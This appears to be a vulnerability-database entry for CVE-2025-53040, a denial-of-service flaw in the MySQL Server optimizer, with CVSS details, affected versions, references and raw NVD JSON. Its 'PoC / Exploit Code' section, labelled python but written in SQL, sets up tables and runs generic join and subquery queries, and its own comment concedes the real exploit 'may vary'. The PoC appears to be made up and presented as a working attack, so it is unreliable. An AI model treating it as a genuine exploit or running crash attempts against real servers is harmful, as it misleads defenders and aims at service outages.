CVE-2025-53040

Description

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.43, 8.4.0-8.4.6 and 9.0.0-9.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:* - VULNERABLE

Oracle MySQL Server 8.0.0 - 8.0.43

Oracle MySQL Server 8.4.0 - 8.4.6

Oracle MySQL Server 9.0.0 - 9.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

-- CVE-2025-53040 PoC: MySQL Optimizer DoS
-- Vulnerability: Denial of Service via Optimizer component
-- Affected: MySQL 8.0.0-8.0.43, 8.4.0-8.4.6, 9.0.0-9.4.0
-- Requires: High privileged MySQL account

-- Connect to the target MySQL server with high-privileged credentials
-- mysql -h <target_host> -u <admin_user> -p

-- Step 1: Create a test database (requires high privileges)
CREATE DATABASE IF NOT EXISTS cve_test_db;
USE cve_test_db;

-- Step 2: Create tables with specific structures to trigger optimizer bug
CREATE TABLE t1 (
    id INT PRIMARY KEY AUTO_INCREMENT,
    col1 VARCHAR(255),
    col2 TEXT,
    col3 INT,
    INDEX idx_col1 (col1),
    INDEX idx_col3 (col3)
);

CREATE TABLE t2 (
    id INT PRIMARY KEY AUTO_INCREMENT,
    ref_id INT,
    data LONGTEXT,
    INDEX idx_ref (ref_id)
);

-- Step 3: Insert sample data
INSERT INTO t1 (col1, col2, col3) VALUES
    ('test1', REPEAT('A', 200), 1),
    ('test2', REPEAT('B', 200), 2),
    ('test3', REPEAT('C', 200), 3);

INSERT INTO t2 (ref_id, data) VALUES
    (1, REPEAT('X', 1000)),
    (2, REPEAT('Y', 1000)),
    (3, REPEAT('Z', 1000));

-- Step 4: Trigger the optimizer vulnerability with a crafted query
-- This complex query is designed to trigger the optimizer bug
SELECT /*+ JOIN_ORDER(t1, t2) */
    t1.id, t1.col1, t2.data
FROM t1
INNER JOIN t2 ON t1.id = t2.ref_id
WHERE t1.col3 IN (SELECT col3 FROM t1 WHERE col1 LIKE '%test%')
ORDER BY t1.col1 DESC
LIMIT 100;

-- Step 5: Alternative trigger - subquery optimization exploit
SELECT * FROM t1
WHERE id IN (
    SELECT ref_id FROM t2
    WHERE data LIKE CONCAT('%', (SELECT MAX(col1) FROM t1), '%')
);

-- Note: The actual exploit may vary depending on the specific
-- optimizer path triggered. The above demonstrates the general
-- approach of using complex queries to trigger the optimizer bug.
-- Monitor MySQL server for hang or crash after execution.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53040
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53040
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53040/
[4] VulDB https://vuldb.com/cve/CVE-2025-53040
[5] https://www.oracle.com/security-alerts/cpuoct2025.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53040", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:41.140", "lastModified": "2025-10-23T16:08:00.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.43, 8.4.0-8.4.6 and 9.0.0-9.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndIncluding": "8.0.43", "matchCriteriaId": "529028FC-6CB5-4885-A524-F26B8F81BD98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.4.0", "versionEndIncluding": "8.4.6", "matchCriteriaId": "7C415C1E-D09A-43DD-A1FB-8B0B9517FE42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndIncluding": "9.4.0", "matchCriteriaId": "5FAEE4AC-4A0D-42A4-BF83-33288DD15BE1"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}